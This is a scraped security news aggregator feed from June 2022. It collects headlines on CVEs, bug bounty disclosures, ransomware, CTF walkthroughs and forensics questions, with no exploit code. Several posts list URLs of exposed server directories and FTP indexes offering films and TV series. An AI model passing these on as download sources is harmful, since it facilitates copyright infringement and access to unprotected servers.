    CPP: Add query for CWE-243 Creation of chroot Jail Without Changing Working Directory
    GitHub Security Lab disclosed a bug submitted by ihsinme: https://hackerone.com/reports/1582697 - Bounty: $1000
    Hyper Link Injection while signup
    UPchieve disclosed a bug submitted by 011alsanosi: https://hackerone.com/reports/1166073
  • Open

    A new vulnerability in Intel and AMD CPUs lets hackers steal encryption keys
    Article URL: https://arstechnica.com/information-technology/2022/06/researchers-exploit-new-intel-and-amd-cpu-flaw-to-steal-encryption-keys/ Comments URL: https://news.ycombinator.com/item?id=31759171 Points: 1 # Comments: 1
    SynLapse – Technical Details for Critical Azure Synapse Vulnerability
    Article URL: https://orca.security/resources/blog/synlapse-critical-azure-synapse-analytics-service-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=31752026 Points: 1 # Comments: 0
    SynLapse – Technical Details for Critical Azure Synapse Vulnerability
    Article URL: https://orca.security/resources/blog/synlapse-critical-azure-synapse-analytics-service-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=31748624 Points: 4 # Comments: 0
  • Open

    Pulling MikroTik into the Limelight
    submitted by /u/0xdea [link] [comments]
    Breaking Secure Boot on Google Nest Hub (2nd Gen) to run Ubuntu
    submitted by /u/Gallus [link] [comments]
    Pwn2Own 2021 Canon ImageCLASS MF644Cdw writeup
    submitted by /u/alain_proviste [link] [comments]
    TPM Sniffing Attacks Against Non-Bitlocker Targets
    submitted by /u/Gallus [link] [comments]
    Bypassing CSP with dangling iframes
    submitted by /u/Gallus [link] [comments]
  • Open

    Red Teaming reconnaissance Process
    Table of Contents Continue reading on Medium »
    Bug Bounty — Injection Part
    Injection flaws are very common in applications today. These flaws occur because user controlled input is interpreted as actual commands… Continue reading on Medium »
    PhpMyAdmin Setup is Accessible Without Authentication
    Description: Continue reading on Medium »
    Getting Started with AllianceBlock DEX on Mainnet
    We walk you through how to use the AllianceBlock DEX, as well as some updates on our progress on the development since we launched. Continue reading on Medium »
    Bypassing OTP verification
    We know that security is the main method of defense against hacker attacks. Some of these safeguards have not prevailed… Continue reading on System Weakness »
  • Open

    Practical Network Penetration Free Live Course
    submitted by /u/MDCDF [link] [comments]
    RAM acquisitions are extremely useful, but not often collected. This video shows how to speed up suspect password cracking with wordlists generated from RAM.
    submitted by /u/DFIRScience [link] [comments]
  • Open

    Doubt about having authenticators in a separated device
    Hello, Last year I almost got robbed with violence in the street. The robbers couldn't steal anything (they tried to take my phone). Since that day, I bought another device and set up the authenticators there. That device will never leave my home, so in case someone tries to rob me or I lose my main phone, my accounts won't be affected. In case of travel, I take the backup codes with me. Do you think this is secure? Thanks for the help and have a good day. Edit: that device only has the authenticators installed and the antivirus. So, it's completely clean. submitted by /u/SilverPigtail [link] [comments]
    Gift for cybersecurity analyst
    Hi! Apologies if you get questions like this a lot, but I haven't seen anything in the last few months about it and I'm not sure how quickly the landscape changes. My husband is a cybersecurity analyst (comp eng degree) and is pretty interested in related things. For instance, I got him a Raspberry Pi and a PineWatch the last few birthdays and he loved that. Would anybody have any suggestions for a gift? No particular price range as it's a big birthday coming up. Thanks in advance for any advice!! submitted by /u/roberl8 [link] [comments]
  • Open

    SecWiki News 2022-06-15 Review
    Google's thinking on building the SOC of the future (automated security operations white paper) by ourren; Mining a goldmine of threat intelligence from leaked logs with Python by ourren; Practical development of automated penetration testing tools by ourren. For more of the latest articles, visit SecWiki
  • Open

    What I Learned In This Week In Cyber 6/16/22
    This week has been quite exciting in terms of what the concepts explored. Here is a highlight of some the concepts I delved into: Continue reading on CodeX »
    What I Learned In This Week In Cyber 6/16/22
    This week has been quite exciting in terms of what the concepts explored. Here is a highlight of some the concepts I delved into: Continue reading on Medium »
  • Open

    [Security Advisory] Microsoft's June 2022 Patch Tuesday fixes multiple high-severity vulnerabilities
    Microsoft recently released its June 2022 security updates, fixing 55 vulnerabilities across 33 Microsoft products, including 12 elevation of privilege, 1 security feature bypass, 27 remote code execution and 11 information disclosure...
  • Open

    Some Website Back-ends
    Website back-ends with some image assets, vectors, and templates. https://16stitches.com/assets/frontend/images/ http://hotelgreenridge.com/wp-content/uploads/ https://huemint.com/assets/ submitted by /u/amritajaatak [link] [comments]
    [French Language Only] Limited Number of Films & TV Series
    http://www.vodservices-ftp.com/FTP_Upload/TEM/ submitted by /u/worldbbbbfree [link] [comments]
  • Open

    FreeBuf Morning Report | Nigeria drafts rules to regulate internet companies; Google fixes 7 Chrome browser vulnerabilities
    The newly revised "Provisions on the Administration of Mobile Internet Application Information Services" take effect on August 1, 2022.
    Malware made it onto the Google Play store and was downloaded more than 2 million times
    Last month, security researchers discovered adware and information-stealing malware in the Google Play store.
    Ransomware's new trick: letting victims check for themselves whether their data was stolen
    To make extortion more efficient, the BlackCat ransomware gang created a dedicated website that lets victims check whether their data was stolen in the attack.
    "Provisions on the Administration of Mobile Internet Application Information Services" to take effect August 1
    The new Provisions have 27 articles, covering responsibility for information content, real identity verification, classified management, industry self-regulation, public supervision and administrative management.
  • Open

    AdmirerToo from HackTheBox — Detailed Walkthrough
    No content preview
    Phishing Domain Detection using Neural Networks
    Applying neural networks on domain name analysis to detect phishing Continue reading on InfoSec Write-ups »
  • Open

    Next-generation Windows exploitation: attacking the Common Log File System
    Authors: 360 Vulnerability Research Institute, 许仕杰 宋建阳 李林双. Original: https://vul.360.net/archives/438. Overview: Over the last two years the Common Log File System (clfs) module has become a hot target for Windows security research. This article first gives some background on clfs, then describes how we fuzzed this target, and finally shares several vulnerability cases and how we used a new method to achieve local privilege escalation. Background: According to Microsoft...
    A brief analysis of exploiting Adobe Reader vulnerability CVE-2021-44711
    Authors: 360 Vulnerability Research Institute, 李双 王志远 willJ. Original: https://vul.360.net/archives/434. Background: In its security patch released this January, Adobe Reader fixed a vulnerability reported by the Cisco Talos security team, CVE-2021-44711; our analysis shows it is the same vulnerability we used to complete our exploit. The vulnerability lies in the JavaScri... that interacts with annotations
    Vulnerability hunting in rack-mounted devices
    Author: 360 Vulnerability Research Institute. Original: https://vul.360.net/archives/413. 0x01 Introduction: The core of IoT device vulnerability hunting is getting hold of the "software" running inside the hardware, after which it becomes ordinary software vulnerability hunting. The remaining steps are the same as for software: reverse engineering and auditing. This article mainly introduces the steps and approach for finding vulnerabilities in rack-mounted and virtual-image security appliances such as firewalls and bastion hosts, and at the end shows some vulnerabilities in related devices...
    Math.abs JIT Optimization Bug in JSC
    Author: 360 Vulnerability Research Institute, 戴建军. Original: https://vul.360.net/archives/397. At Tianfu Cup 2021 we successfully achieved RCE on the iPhone 13 Pro; this article describes in detail the Safari JavaScriptCore (JSC) vulnerability we used, CVE-2021-30953. ArithNegate: during JSC's FTL JIT optimization, for the expression -n...
    USMA: User Space Mapping Attack
    Authors: 360 Vulnerability Research Institute, 刘永 王晓东 姚俊. Original: https://vul.360.net/archives/391. Overview: ROP is a mainstream Linux kernel exploitation technique, but it requires the attacker to find usable gadgets based on the vulnerability, which is very time-consuming and sometimes no suitable gadget can be found. Moreover, since CFI (control-flow integrity) mitigations have been merged into the mainline Linux kernel, ...
  • Open

    CVE-2022-29143 Microsoft SQL Server Remote Code Execution
    Article URL: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29143 Comments URL: https://news.ycombinator.com/item?id=31748201 Points: 4 # Comments: 0

  • Open

    Counting in Regexes Considered Harmful: Exposing ReDoS Vulnerability of Nonback
    Article URL: https://www.usenix.org/conference/usenixsecurity22/presentation/turonova Comments URL: https://news.ycombinator.com/item?id=31747225 Points: 1 # Comments: 0
    Intel and AMD Hertzbleed CPU Vulnerability Uses Boost Speed to Steal Crypto Keys
    Article URL: https://www.tomshardware.com/news/intel-amd-hertzbleed-cpu-vulnerability-boost-clock-speed-steal-crypto-keys Comments URL: https://news.ycombinator.com/item?id=31745490 Points: 1 # Comments: 0
    SynLapse – Technical Details for Critical Azure Synapse Vulnerability
    Article URL: https://orca.security/resources/blog/synlapse-critical-azure-synapse-analytics-service-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=31741670 Points: 7 # Comments: 1

    Why Are My Junctions Not Followed? Exploring Windows Redirection Trust Mitigation
    Junctions are a feature of the NT file system – and a common way that attackers exploit file system redirection attacks. Learn about mitigation. The post Why Are My Junctions Not Followed? Exploring Windows Redirection Trust Mitigation appeared first on Unit 42.

    Developer's mistakes lead to full ATO!
    A wise man once said "In order to get high quality bugs, start playing with the website's functionalities." Continue reading on Medium »

    Windows Subsystem for Linux
    I am doing an investigation right now and found an ext4.Vhdx. When I researched this file it said that it would most commonly be associated with WSL, allowing a user to run Linux commands without having to boot into a Linux partition. Is there any potential forensic value found here? And how do I get it to open? I exported it out and tried processing it with Axiom, but it didn't really work. Edit: I was able to get it extracted from its zip file and loaded into Axiom. Looks like it is 256GB in size, but there are no files active. It is just empty space. Am I missing something, or could this be some sort of thing where the user or malicious actor set it up and never used it? submitted by /u/trex4n6
    Entry level certification recommendations
    Hi all, I am wondering what certifications you would recommend for someone going into DF? I am going to Kent State in the fall to get my BS in Computer Engineering Technology with a minor in computer forensics and security. I want recommendations for certifications that I could take as a HS grad. Thanks submitted by /u/swatteam23
    Passware on T2 MacBook Air help.
    I have a MacBook Air (2020) with T2 that is password protected. I'm trying to use Passware's new T2 option and run a custom dictionary attack. I'm getting stuck at the DFU stage. Can someone private message me if they have any experience? Other details: I've used multiple different cables without success. I'm using my forensic MacBook Pro, Big Sur. submitted by /u/james1234cb
    Locked Cellphone
    So I have a locked cellphone and was recommended a software that is way too expensive. Since it is just one phone, it was mentioned that back in the day they sent it to CAS. Anyone know more about the services/lab, for example is it an accredited lab? I'm going to reach out to them, but in the meantime I thought I would try here. Has anyone brought one of these devices to court after CAS touched it? submitted by /u/fanmajor2
    Volatility2 RHEL 8 profile
    I'm attempting to use Volatility to perform memory analysis on a RHEL8 .vmem file. Unfortunately the latest RHEL profile available at https://github.com/volatilityfoundation/profiles is for 6.7. I did see some example CLI where a LinuxRedhat8_3_4_18_0-240x64 profile was used. Can anyone by chance link/send me a RHEL8 profile for Volatility? submitted by /u/Styrophoams

    Red-Team Project Management
    Say you perform a red team assessment in a network. How do you keep track of your tools, agents, etc. that you've deployed during your project? Do you use any kind of software for documenting and saving your artifacts? How do you manage it when working with multiple people on your team? submitted by /u/w0rmh013x
    Why is it important to remove stale devices in AD?
    I understand why it's important to delete inactive users in AD, but why should we remove unused/dead devices? What are the security risks? submitted by /u/athanielx
    What exactly does UPnP do?
    I have been reading about UPnP, and I am stuck on whether we need to submit the Wi-Fi password to the UPnP device to connect it to a network. It says UPnP can auto-configure and doesn't need authentication. We can simply specify the port number and it connects the device to that service. Does our smartphone use UPnP when connecting to a Wi-Fi network? What devices use UPnP? submitted by /u/mkkedia3
    Vivo Fibra with public IP routers, safe?
    Hi, hope you're all alright! So, Vivo is my ISP here in Brazil and they send their own router for you to connect to their fiber service. These routers however have their public IP open to the internet, which I can only imagine is for support reasons. Through this IP, you can actually access the router interface (http, not https), with things like hardware model, serial number and software version freely accessible; only the configuration page is behind a login form. My fear is this is not a secure setup. I even searched my hardware model and found a big CVE where you could get access through SSH, but I think it is fixed on my machine. Another weird thing is the DNS6 servers (2001:12e0:0:1025:a080::115 and others), which cannot be changed. You can actually search this DNS on Google and find many such routers there. I never trusted Vivo, so I always used a personal router where my devices are connected and disabled their WiFi. I'm now disabling their IPv6, to avoid this Google thing. But is this safe? Are my fears not based on reality? submitted by /u/TiagodePAlves

    Hertzbleed - a new family of side-channel attacks
    submitted by /u/CyberMasterV
    Oblivious HTTP
    submitted by /u/nangaparbat
    Zimbra Email - Stealing Clear-Text Credentials via Memcache injection
    submitted by /u/0xdea
    CVE-2022-25845 – Analyzing the Fastjson “Auto Type Bypass” RCE vulnerability
    submitted by /u/SRMish3
    What if you don't secure SSH on EC2? - Analysis of the real threats
    submitted by /u/capitangolo
    Chaining vulnerabilities to criticality in Progress WhatsUp Gold
    submitted by /u/Mempodipper
    Credential Protection in Chromium-based Browsers
    submitted by /u/jat0369
    If you want to play with Dogwalk windows vulnerability
    submitted by /u/cryptaureau
    Quick Malware Analysis: Emotet Epoch 5 infection with spambot traffic pcap from 2022-04-04
    submitted by /u/dougburks

    Analysis of Chinese aircraft carriers: their history, modifications, spotted places, and what the…
    The president of the United States, Joe Biden, has answered “yes” during a press conference on May 23, 2022 in South Korea, to the… Continue reading on Medium »
    Introduction to OSINT
    Open Source Intelligence (OSINT) is a collective term used to describe all techniques and tools used to harvest information from publicly… Continue reading on Medium »
    War in Ukraine / June 13
    Russia earned $98 billion from energy exports in 100 days of war Continue reading on Medium »

    Introducing Ghostwriter v3.0
    The Ghostwriter team recently released v3.0.0. This release represents a significant milestone for the project, and there has never been a… Continue reading on Posts By SpecterOps Team Members »
    A day in the life of the Cyber Security team at KBTG
    Although the work of the three teams differs, we share one common goal: keeping the bank safe from cyber threats. Continue reading on KBTG Life »
    How to set up and operate a red team in your company to support a sustainable cybersecurity…
    Hack yourself to prevent being hacked. This more or less describes the term "Red Teaming." But why do you need a red team though you… Continue reading on CodeX »
    How to set up and operate a red team in your company to support a sustainable cybersecurity…
    Hack yourself to prevent being hacked. This more or less describes the term "Red Teaming." But why do you need a red team though you… Continue reading on Medium »

    SecWiki News 2022-06-14 Review
    Cloud I Hack into Google Cloud by h4ck01; A glimpse at Shodan and Censys scanning by Avenger. For more of the latest articles, visit SecWiki

    THQ Nordic - Media and Game Assets
    submitted by /u/xD3CrypTionz

    How I found a Critical Bug in Instagram and Got 49500$ Bounty From Facebook

    HTML Injection in E-mail
    Acronis disclosed a bug submitted by mega7: https://hackerone.com/reports/1536899
    Reflected Cross Site Scripting at ColdFusion Debugging Panel http://www.grouplogic.com/CFIDE/debug/cf_debugFr.cfm
    Acronis disclosed a bug submitted by ub3rsick: https://hackerone.com/reports/1166918
    Reflected Cross Site Scripting at http://www.grouplogic.com/files/glidownload/verify3.asp [Uppercase Filter Bypass]
    Acronis disclosed a bug submitted by ub3rsick: https://hackerone.com/reports/1167034
    Rails::Html::SafeListSanitizer vulnerable to xss attack in an environment that allows the style tag
    Ruby on Rails disclosed a bug submitted by windshock: https://hackerone.com/reports/1530898

    TC260 publishes draft for comment of the "Guidelines for Managing App Personal Information Processing Activities"
    The draft provides mobile smart terminals with guidance on designing App personal-information security features and managing personal-information security risks, so that Apps are more explicit about how they collect personal information.
    Stay alert: HelloXD ransomware may be deploying a new backdoor on your systems
    Observers recently found that the HelloXD ransomware has deployed a new backdoor, MicroBackdoor, aimed at strengthening its persistent remote access to infected hosts.
    FreeBuf Morning Report | Microsoft ends support for Internet Explorer today; cybersecurity risks of smart commercial buildings come to the fore
    After support ends, it will be replaced by the new Chromium-based Microsoft Edge; users launching IE11 will be automatically redirected to Edge.
    Fake DM phishing, impersonated artists, high-priced resales: common NFT scams
    Some common scams involving NFTs; learn to recognize them and avoid being taken in.
    Post-quantum cryptography: changing online security
    In essence, cryptography is simply a means of protecting and encrypting information.
    Russia's Sandworm group exploits the Follina vulnerability to breach key Ukrainian institutions
    Ukraine's Computer Emergency Response Team (CERT) warns that the Russian hacking group Sandworm may be exploiting the vulnerability known as Follina to attack Ukraine.
    45% of cybersecurity practitioners are considering leaving the industry due to excessive stress
    The main sources of stress are the relentless threat of ransomware and the need to be on call at all times.
    When will SASE see a market breakout?
    A SASE market breakout will take another 3 to 5 years; remote work and IoT will be favorable factors driving this market in the short term and are worth watching.
    Job postings from Yibin Cowin Automobile Co., Ltd.
    Job postings from Yibin Cowin Automobile Co., Ltd.
    Wi-Fi probing is tracking you and leaking your privacy
    Wi-Fi probing can easily obtain all kinds of private user information and can also track users in real time.
    Microsoft: Exchange servers are being used to deploy BlackCat ransomware
    According to a June 13 report by BleepingComputer, attackers are using BlackCat ransomware against vulnerable Microsoft Exchange servers. In cases observed by Microsoft security experts, the attackers used unpatched Exchange servers as the entry vector for the initial attack and, two weeks later, deployed the BlackCat ransomware payload across the network via PsExec. "While common entry vectors for these threat actors include remote desktop applications and compromised credentials

    CVE-2022-26134 being exploited to download and deploy the Cerber2021 ransomware
    Article URL: https://twitter.com/MsftSecIntel/status/1535417779960131584 Comments URL: https://news.ycombinator.com/item?id=31735573 Points: 2 # Comments: 0

    Analysis Report on Recent Hidden Malicious Code Sites on a Chinese HFS HTTP File Servers
    submitted by /u/Late_Ice_9288


    Exposed Travis CI API Leaves All Free-Tier Users Open to Attack
    submitted by /u/mkatch
    The many lives of BlackCat ransomware
    submitted by /u/SCI_Rusher
    JWT attacks (with online labs)
    submitted by /u/albinowax
    Privilege Escalation in Microsoft Azure Synapse Analytics
    submitted by /u/dinobyt3s
    The State of CSRF Vulnerability in 2022
    submitted by /u/utku1337

    Tenable CTF 2022 — Babby Web 2
    Same link? I wasn’t so sure at first. After poking a bit, I read the challenge again and “authentic” finally stuck out. This should have… Continue reading on Medium »
    Careers in Cyber | TryHackMe
    Lab Access: https://tryhackme.com/room/careersincyber Continue reading on Medium »

    Hello
    What's your opinion on antiviruses? Because my mum is always saying "u nid antavarus coz money bank omy god ur so trash at computers", while most antivirus programs are just a money rip-off and you can just use your brain when using the computer. submitted by /u/xblacky11
    How to secure a BIND DNS server exposed to the Internet?
    Any tools, utilities or recommendations to detect and block DNS attacks like amplification? Please note that the server has to be exposed to the Internet. submitted by /u/aim4r
    PASTA real-life example
    I am looking for some real-life examples of PASTA applied to an organization/application. I have an understanding of the process, the seven stages etc. I would like to see some actual inputs and outputs of all the seven stages. Is there anything like that available anywhere? submitted by /u/palm_snow

    War in Ukraine / June 10–12
    Ukraine needs 1,000 howitzers Continue reading on Medium »
    Fingerprinting email senders…
    Hello… Today we will discuss fingerprinting (logging) email senders. First, what is logging. This is the logging process i.e. information… Continue reading on Medium »


    SecWiki News 2022-06-13 Review
    SecWiki Weekly (Issue 432) by ourren. For more of the latest articles, visit SecWiki

    Remote Forensics on Live Systems
    I posted in /r/CrowdStrike about using Real Time Response to perform forensics. TL;DR While CrowdStrike offers Falcon Forensics, some organizations have not purchased it. I have seen a post mentioning KAPE, Kansa and PowerForensics. However, both the Kansa and PowerForensics projects seem to be unmaintained. Additionally, there were concerns about using KAPE as it could over-write memory, HDD space, etc. For Falcon Forensics, an EXE has to be copied (if not already present on the endpoint) and executed. Couldn't that over-write memory, HDD space, etc. as well? I am digging into the KAPE docs now and comparing the capabilities of Falcon Forensics to KAPE. What are folks using these days for remote forensics against live systems? Do you agree about the over-writing concerns? TIA Kevin submitted by /u/kevinelwell
    Anatomy of an NTFS FILE Record - Windows File System Forensics
    Good morning, it’s time for a new 13Cubed episode! In this one, we’ll talk about the structure and composition of an NTFS FILE record. Then, we'll take a look at a sample record for a resident file and learn how to manually extract the important attributes. Note that there is also an accompanying cheat sheet which may come in handy (see the video’s description)! Episode: https://www.youtube.com/watch?v=l4IphrAjzeY Episode Guide: https://www.13cubed.com/episodes/ 13Cubed YouTube Channel: https://www.youtube.com/13cubed 13Cubed Patreon (Help support the channel and get early access to content and other perks!): https://www.patreon.com/13cubed submitted by /u/13Cubed

    Dreamcast Games and Movies. Yes, people are still making new movies playable on Dreamcast.
    submitted by /u/RealAGB
    Older Movies and TV - Mostly Horror
    https://movies.encrypticmh.appboxes.co/ https://tv.encrypticmh.appboxes.co/ submitted by /u/sy029
    cow breeds
    submitted by /u/PM_ME_TO_PLAY_A_GAME

    GALLIUM Expands Targeting Across Telecommunications, Government and Finance Sectors With New PingPull Tool
    A new, difficult-to-detect remote access trojan named PingPull is being used by GALLIUM, an advanced persistent threat (APT) group. The post GALLIUM Expands Targeting Across Telecommunications, Government and Finance Sectors With New PingPull Tool appeared first on Unit 42.

    Lack of rate limit on authentication login page & forgot password page
    Showmax disclosed a bug submitted by saidkira: https://hackerone.com/reports/1591764

    NTLM Authentication in Active Directory
    How to get started in Cybersecurity in 2022

    Talking about the recent CVE-2022-30190
    Author: heige@Knownsec 404 Team. Original link: https://mp.weixin.qq.com/s/tb0K-qLcZo-9OeW3KsIrTg Quite a few in-the-wild 0days have been exposed recently, which looks like it will supply plenty of ammunition for this year's year-end review. When I saw this vulnerability I left a brief comment in my WeChat Moments: by my standards, CVE-2022-30190 (Follina) counts as a "god-tier bug", far higher in quality than CVE-2021-40444. Every...


    Best approach to start mobile (Android/iOS) exploit dev?
    Hello, I'm thinking about a career in mobile (Android/iOS, especially Android) security research and I would like to know what is the best way to go for it, in terms of methodology and best resources to learn from. I do have some experience with x86 Assembly and programming languages (mostly high level like C#, Dart and all, with some experience in C++ for software development). I would appreciate any suggestions, thank you very much in advance! submitted by /u/Ankhyx

    How to check a Google Doc for when specific entries were made?
    I don't have editing permissions or anything like that. Is there any way to find out when a certain entry was made? I only have the downloaded file. I am trying to prove it was edited after a specific date. submitted by /u/tirehu
    How can I tell if a document has come straight from the official source or if it has been opened and edited off that official site? I
    How can I tell if a document has come straight from the official source or if it has been opened and edited off that official site? I already know I have a document that has been tampered with because I was able to get the originals. Today I opened both of them up on my laptop through Google Docs and the authentic one opened up and looks exactly the same. The altered one, when opened up, I noticed opened in a different layout. The text isn’t the same size, some of the text is yellow, some of the letters like the “s” are changed to a $ sign. Does this show more proof that they were altered, I’m guessing on a computer not associated with the official place? I am not a computer person, but I remember professors saying how they can put your papers in something and it will show if parts are copied and pasted or plagiarized or whatever. So did I just discover more evidence that backs up on a tech level that these documents were altered after being received off of the original source? submitted by /u/Antique-Dark-907

    Professional advice needed
    Utilizing my college years. Hello all, I have recently just finished my first year of undergrad at UOregon as a Computer Science major. I have a strong interest in cybersecurity and went into this school hoping to find more opportunities to indulge in cybersec-like activities. At the beginning of the school year, I ended up landing an IT tech/helpdesk position at my school as well. A few months later, I landed a position at the cybersecurity office here at the school. So, I am currently working as a Student IT Technician and a Student Security Analyst. I plan on working the IT job through summer 2022 and then quitting, to increase my hours at the analyst position. I plan on staying in that position until I graduate. This position also offers assistance and guidance towards certifications. I plan on getting my Network+ this summer, and then Security+ sometime in 2023. After I graduate I will have just about four years of experience within the cybersecurity dept. at my school. On another note, I am doing a good amount of home study as well, and really trying to push my Python skills to the next level. What I am really trying to do, and what will be my goal until I graduate, is to put myself in the best position, and set myself up as much as possible, to be able to land a great job once I graduate. The reason I am posting is to ask more experienced personnel: what more can I do to set myself up for a great career? I feel like I am on a good track at the moment, but I want to fully utilize the next 3 years I have in college. Thank you for reading! P.S. I may be posting in other places, sorry for the spam if I end up doing so. submitted by /u/Straight_Bid_5577
    Wi-Fi malware
    I don’t know if this is the right place to ask. If it’s not, tell me where I should write it, thank you. My question may seem stupid, but: I accidentally connected to a Wi-Fi network which I’ve never seen before (and haven’t seen since I disconnected). The Wi-Fi network was apparently one of my neighbor’s networks, but again, I never saw that Wi-Fi before or after. The Wi-Fi network had no password; I immediately disconnected, in like 5-10 seconds. Is it possible to get any malware or other kinds of unwanted software, spyware, adware through that Wi-Fi connection? Thank you, and again, if this is the wrong place to ask about it, let me know. submitted by /u/mesropmashtots
    A question for full time pen testers
    All of these CTFs and junk really seem to get crazy about using gobuster or dirbuster. Do any of you full time pen testers that have been doing this for a while ever actually feel the need to use this? Now granted most of my experience is net pen not web app, but I wanted to get a consensus from more people. submitted by /u/networkalchemy

    Vulnerability During Transition
    Article URL: https://biggestfish.substack.com/p/vulnerability-during-transition Comments URL: https://news.ycombinator.com/item?id=31716383 Points: 2 # Comments: 0
    Exploration of the Dirty Pipe Vulnerability (CVE-2022-0847)
    Article URL: https://lolcads.github.io/posts/2022/06/dirty_pipe_cve_2022_0847/ Comments URL: https://news.ycombinator.com/item?id=31712986 Points: 42 # Comments: 1

    Researcher defends Formidable in fight against ‘critical’ CVE assignment
    Article URL: https://portswigger.net/daily-swig/researcher-defends-formidable-in-fight-against-critical-cve-vulnerability-assignment Comments URL: https://news.ycombinator.com/item?id=31716274 Points: 2 # Comments: 0

    I wrote a non technical post on my blog regarding security specialists, nihilistic behavior, and how to stay positive. Sometimes we need a reminder that, after all, things are not that bad.
    submitted by /u/last0x00
    A project for aspiring hackers to easily learn our craft
    submitted by /u/cr0mll
    bevigil-cli : A handy tool to extract assets like subdomains, URL params, hosts, S3 buckets, URLs from android applications through BeVigil OSINT API with ease.
    submitted by /u/xscorp7
    NGINX security: Everything you may not need to know about NGINX error logs - complete guide
    submitted by /u/jwizq
    I made a browser extension that spoofs your location data to match your VPN. It can also spoof your user agent.
    submitted by /u/z0ccc_z0ccc

    SecWiki News 2022-06-12 Review
    No news updates yet today. For more of the latest articles, visit SecWiki

    Learning More About YAML Deserialization
    Introduction Continue reading on InfoSec Write-ups »
    TryHackMe: LazyAdmin

    Phoneinfoga- Wikipedia of Phone Numbers.
    The Wikipedia Of Phone Number…Read This Article To Know All The Information Of Your Phone Number, Its All PUBLIC!! Continue reading on Medium »

    The Four V’s of Effective Cybersecurity Posture
    There are four critical angles to achieve optimal cyber defense: Visibility, verification, vigilance, and validation. Rapid development… Continue reading on Purple Team »


    All user password hashes can be seen from the admin panel
    UPchieve disclosed a bug submitted by dark_haxor: https://hackerone.com/reports/1489892
    CVE-2022-30115: HSTS bypass via trailing dot
    Internet Bug Bounty disclosed a bug submitted by haxatron1: https://hackerone.com/reports/1565622 - Bounty: $2400
    CVE-2022-27780: percent-encoded path separator in URL host
    Internet Bug Bounty disclosed a bug submitted by haxatron1: https://hackerone.com/reports/1565619 - Bounty: $2400
    CVE-2022-27779: cookie for trailing dot TLD
    Internet Bug Bounty disclosed a bug submitted by haxatron1: https://hackerone.com/reports/1565615 - Bounty: $2400
    Disclosure of the live_analytics information of any livestream.
    TikTok disclosed a bug submitted by datph4m: https://hackerone.com/reports/1561299 - Bounty: $1000
    Email address disclosure via invite token validation
    TikTok disclosed a bug submitted by noob_but_cut3: https://hackerone.com/reports/1560072 - Bounty: $250

    What is your experience with being a digital forensic investigator?
    I'm currently looking into this line of work and I wanted to know what it's like. I've seen some people have bad experiences while others recommend this job. submitted by /u/Late_Ranger5256
    FTK toolkit 6.3.1, software completely unusable during index and index merge
    Am I just some kind of moron, or is this software supposed to be 100% unusable for 15 straight hours while it does the initial index and then the index merge? Has FTK just turned into the ultimate billable hours machine? It's 2 million items; this shouldn't really be taking this long, right? submitted by /u/NinjaLion

    Binary Analysis with Strace
    submitted by /u/DLLCoolJ
    OUs and GPOs and WMI Filters, Oh My!
    submitted by /u/5ub34x_

    CREST CRT exam prep?
    I'm well on my way with studying for my CPSA. Any advice on labs, TryHackMe rooms/paths or HackTheBox boxes that I should be concentrating on for the CRT exam? Any advice appreciated. submitted by /u/Snoo77500
    Slowloris mitigation on SSH
    Hi, I know Slowloris typically runs over HTTP, but for an assignment I had to run a Slowloris over SSH instead of over HTTP and had to find ways to mitigate the attack. The usual answer you find for a standard Slowloris attack is that you should use nginx, but even then there was conflicting information on the web. I tried to mitigate the attack over SSH with a simple iptables rule, but apparently there are more ways to stop this style of attack, especially if it is a distributed attack, where iptables would not really work. I tried to find a way to check for especially long-lasting or slow connections but did not find any good resources. How would you protect a system against such an attack? submitted by /u/curkus
    How to use Chromium web developer tools to change the HTML and bypass to gain admin panel access?
    Hello, I was told I should check the HTML of the User Registration website (code at the bottom) to know how to do this. I think I should change this line of code: Admin Panel but I don't know how to change the HTML. Should I use the web developer tools for Chromium? I've been blocked on this for too long. Thanks for any help. CODE: Password Confirm password Admin Panel div class="btn-group"> Info Only possible if you have a special autorisation submitted by /u/Traditional_Bird_877

    Timing from HackTheBox — Detailed Walkthrough
    [Bug Bounty] How I was able edit AWS’s files from file upload function?

    SecWiki News 2022-06-11 Review
    Demystifying vulnerability propagation and its evolution through dependency trees in the NPM ecosystem by ourren. For more of the latest articles, visit SecWiki

    Index of open FTP servers
    https://www.mmnt.net/ There are many FTP servers indexed, like https://www.mmnt.net/db/0/0/88.166.133.247/Public/Films%20&%20S%C3%A9ries , films you can download. submitted by /u/iams0rry

    First CTF — Tenable CTF 2022
    So this week I did a thing, joined Tenable CTF this year. So far its honestly showing me my weak points. I look forward to seeing if I can… Continue reading on Medium »

    Exposing HelloXD Ransomware and x4k
    HelloXD is a ransomware family in its initial stages – but already seeking to impact organizations. We analyze samples and hunt for attribution. The post Exposing HelloXD Ransomware and x4k appeared first on Unit 42.


    photos of old paintings
    submitted by /u/PM_ME_TO_PLAY_A_GAME
    Is it possible to explore hidden folders of open directories?
    Sometimes when you explore open directories by adding /storage /drive /disk to the top-level address of the open directory index, you can enter and access a kind of hidden directory which was not visible at the top level of the open directory index! But it is a hard job to do manually, adding /storage1 /drive2 /disk3 etc. (as I am not even sure if those directories even exist); it depends on the directory, but sometimes it exists! So I want to know if there are any tips to explore "the hidden directories that are not present at the top index level but which are actually accessible by manually typing in the address bar". Thanks in advance guys submitted by /u/Synchel

    Denial of Service Vulnerability in Envoy Proxy – CVE-2022-29225
    Article URL: https://jfrog.com/blog/denial-of-service-vulnerability-in-envoy-proxy-cve-2022-29225/ Comments URL: https://news.ycombinator.com/item?id=31700170 Points: 1 # Comments: 1
    Apple M1 chip contains hardware vulnerability that bypasses memory defense
    Article URL: https://www.theregister.com/2022/06/10/apple_m1_pacman_flaw/ Comments URL: https://news.ycombinator.com/item?id=31696129 Points: 5 # Comments: 0
    Vulnerability in Gitlab: Sending Arbitrary Requests Through Jupyter Notebooks
    Article URL: https://liman.io/blog/gitlab-security-vulnerability-jupyter-notebooks Comments URL: https://news.ycombinator.com/item?id=31695949 Points: 3 # Comments: 0
    MIT Finds Apple M1 Vulnerability, Demos Pacman Attack
    Article URL: https://www.tomshardware.com/news/mit-finds-vulnerability-in-arm-chips-demos-pacman-attack-on-apple-m1 Comments URL: https://news.ycombinator.com/item?id=31693578 Points: 5 # Comments: 1
    Apple M1 Affected by Pacman Hardware Vulnerability in Arm Pointer Authentication
